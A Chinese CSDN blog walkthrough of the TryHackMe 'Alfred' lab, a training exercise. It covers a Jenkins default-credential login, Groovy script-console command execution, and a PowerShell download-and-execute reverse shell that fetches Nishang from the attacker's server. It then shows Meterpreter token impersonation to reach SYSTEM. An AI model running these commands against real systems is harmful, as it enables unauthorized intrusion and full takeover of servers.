TryHackMe-进攻性渗透测试-02_Alfred

已于 2023-01-15 14:22:25 修改
阅读量251 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: jenkins 网络安全 安全 web安全
于 2022-12-23 10:10:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128416349
版权

Alfred

在这个房间里,我们将学习如何利用广泛使用的自动化服务器上的常见错误配置(Jenkins - 此工具用于创建持续集成/持续开发管道,允许开发人员在更改代码后自动部署其代码)。之后,我们将使用一种有趣的权限提升方法来获得完整的系统访问权限。

由于这是一个Windows应用程序,我们将使用Nishinang来获得初始访问权限。存储库包含一组有用的脚本,用于初始访问、枚举和权限提升。在本例中,我们将使用反向 shell 脚本

循例 nm 扫

┌──(root💀kali)-[/home/sugobet]
└─# nmap -sV 10.10.243.186 -Pn

这波不一样,需要加-Pn,否则扫不出来,因为题目说了机器禁ping

开了三个端口

80/tcp   open  http       Microsoft IIS httpd 7.5
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT

80端口的web只有一张图片,先到8080看看有没有东西

是一个登录页面,翻了一眼源代码和抓包,都没啥东西,似乎也没有sqli,

刚打算爆破,试了一下弱口令,还真成功了

username: admin
password: admin

有一处地方能够执行命令,查阅文档:https://www.jenkins.io/doc/book/managing/script-console/

文档中的一句话引起了我的注意:

是Jenkins运行时中基于Web的Groovy shell。Groovy是一个非常 一种功能强大的语言,它提供了实际上做Java所能做的任何事情的能力 包括:

百度搜索groovy语言相关文档,最终发现 execute可以执行命令

在groovy中只要把字符串后面调用execute方法就能执行字符串中的命令,当然前提条件是这个字符串是相应平台上的可执行命令

.

"whoami".execute().text

成功,现在尝试reverse shell:

发现powershell是可用的,那就用它来getshell,构造payload:

常规的payload好像不行,看看nishang的github

方法 1.使用内存中的下载并执行: 使用以下命令从远程 shell、meterpreter 本机 shell、Web shell 等执行 PowerShell 脚本及其导出的函数。尼尚中的所有脚本都会在当前 PowerShell 会话中导出具有相同名称的函数。

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

使用之前先下载 https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

然后在攻击机上:

python3 -m http.server

尝试rce 反弹shell:

"powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.17.14:8000/windows-tools_and_exp/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.14 -Port 8888".execute()

成功

Ncat: Connection from 10.10.243.186.
Ncat: Connection from 10.10.243.186:49296.
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files (x86)\Jenkins>

PS C:\Users\bruce\Desktop> type c:\users\bruce\desktop\user.txt
79007a09481963edf2e1321abd9ae2a0

使用metasploit生成个metpreter的reverse shell然后利用rce将其下载到目标

"powershell '(New-Object System.Net.WebClient).Downloadfile('http://10.11.17.14:8000/met_rev.exe','shell-name.exe')'".execute()

msfconsole> use exploit/multi/handler开启监听

在我们刚开始的reverse shell启动这个reverse shell:

Start-Process "met_rev.exe"

meterpreter:

load incognito 

list_tokens -g 查看可用token

impersonate_token "BUILTIN\Administrators"  使用token

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

即使您具有更高特权的令牌,您实际上也可能没有特权用户的权限(这是由于 Windows 处理权限的方式 - 它使用进程的主令牌而不是模拟令牌来确定进程可以或不能执行的操作)。确保迁移到具有正确权限的进程(上述问题已回答)。最安全的拣选过程是服务.exe过程。首先使用 ps 命令查看进程并查找服务.exe进程的 PID。使用命令迁移 PID 进程迁移到此进程

尝试转储到lsass.exe

meterpreter > migrate 676
[*] Migrating from 2300 to 676...
[*] Migration completed successfully.

shell

C:\Windows\system32>type C:\Windows\system32\config\root.txt
type C:\Windows\system32\config\root.txt
dff0f748678f280250f25a45b8046b4a
Sugobet
关注
专栏目录
TryHackMe - Alfred
Yin520的博客
03-25 1114
利用 Jenkins 获得初始 shell,然后通过利用 Windows 身份验证令牌来提升权限。
TRY HACK ME |Alfred「利用Jenkins配置错误提权」
AKAHRZ的博客
04-16 462
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Alfred「利用Jenkins配置错误提权」THM靶场:AlfredTASK1 谁是最佳员工?TASK2 获得初始 shellTASK3 权限提升TASK4 不.
Metasploit渗透测试框架
乌云毕力格博客
07-16 1902
第一章:走近Metasploit渗透测试框架 cisp-pte视频教程:https://download.csdn.net/download/asd2588258/20323819 渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以 发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过 渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安
Vulnhub渗透记录2-Warzone2
qq_43936524的博客
12-12 574
文章目录下载端口扫描FTP连接1337端口反弹shellssh连接 下载 虚拟机下载地址:http://www.vulnhub.com/entry/warzone-2,598/ 攻击机:kail 192.168.169.128 靶机:192.168.169.131 端口扫描 找到靶机所在ip后进行端口扫描 nmap -A -p- -T4 -P0 192.168.169.131 FTP连接 开启了ftp服务 输入anonymous尝试匿名连接 发现靶机允许进行ftp匿名连接。 发现有三张PNG。 下载
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1663
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
Linux命令搜索工具_Alfred_插件,_命令数据来源于_httpsgithub.com_alfred-linu
09-17
Linux命令搜索工具_Alfred_插件,_命令数据来源于_httpsgithub.com_alfred-linux-command
alfred-chrome-workflow:Alfred工作流程以搜索Chrome的书签和历史记录
03-16
$ npm install --global alfred-chrome-workflow 在/Users/<username>/Library/Application Support/Google/Chrome/<chrome>/上检查您的chrome_profile 。 默认值由Default设置。 如果chrome_profile不正确,您将...
alfred-polyglot::Japanese_free_of_charge_button:使用Alfred中的Google翻译翻译文本
02-04
$ npm install --global alfred-polyglot 需要 7.6+和阿尔弗雷德。 建立 如果未指定to参数,则设置默认语言文本将被翻译为。 trans !set default-language (language) 删除默认的翻译工作流程。 导航 Alfred ...
alfred-open-with-vscode-workflow:Alfred 4工作流程,用于在Visual Studio Code中打开文件或文件夹
05-16
基于的Alfred 2工作。 安装 双击.alfredworkflow文件进行安装 请注意,使用工作流程需要 。 用法 打开 使用关键字code触发工作流程 按enter打开当前文件夹或所选文件 或者,键入要打开的路径(例如~/Desktop ) ...
alfred-workflow-translate::top_hat:通过Alfred快速访问Google翻译
05-04
适用于Alfred 3+的Google翻译工作流程 通过Alfred快速访问Google翻译。 带有两个示例关键字触发器:“ es”(英语到西班牙语)和“ se”... 使用npm安装此软件包: $ npm install -g alfred-workflow-translate
metasploit 渗透测试笔记(meterpreter篇)
xysoul的专栏
04-17 7010
0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。 连上vpn又在内网中使用psexec和bind_tcp的时候经常会
TryHackMe-PowerShell_for_Pentesters
M1n9K1n9的博客
01-02 124
您是否具有直接外壳访问权限并尝试 以土地为生或使用命令控制基础设施,例如 作为盟约,PowerShell是一个强大的工具。本节 将涵盖PowerShell的基础知识,这些基础知识在任何参与中都很有用。
TryHackMe新手村
weixin_55154296的博客
04-17 7881
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)
冬萍子癸水
05-26 1206
1 扫描 主要就是80进web搜集信息 C:\root> nmap -A 10.10.16.216 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.64 secon
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3759
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
TRY HACK ME | Steel Mountain「利用powershell提权」
AKAHRZ的博客
04-09 4474
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
form data 和request payload 和Query String Parameters
Alfred的博客
06-25 4407
# enctype 属性  在下面的例子中,表单数据会在未编码的情况下进行发送:  ``` First name:  Last name:  ``` ##定义和用法  enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码。  默认地,表单数据会编码为 "application/x-www-form-urlencoded"。就是说,
Jenkins基于tag的构建
felix_alone2012的博客
09-17 411
介绍Jenkins流水线的构建如何基于tag版本进行。
k8s部署jenkins集群时,使用ThinBackup进行定期备份
最新发布
天草二十六
09-20 366
使用k8s部署jenkins集群的时候,一般会把$JENKSIN_HOME(默认是/var/jenkins_home)进行持久化。这样,机器重启,保证不会丢失文件。本文要讲述的是如何及时对Jenkins进行备份,也存放在$JENKSIN_HOME目录下。
K-SCD算法:过完备字典设计
在论文"K-SVD: An Algorithm for Designing Overcomplete Dictionaries for Sparse Representation"中,作者Michal Aharon, Michael Elad, 和 Alfred Bruckstein提出了K-SVD算法,该算法不仅用于信号分解,还为设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值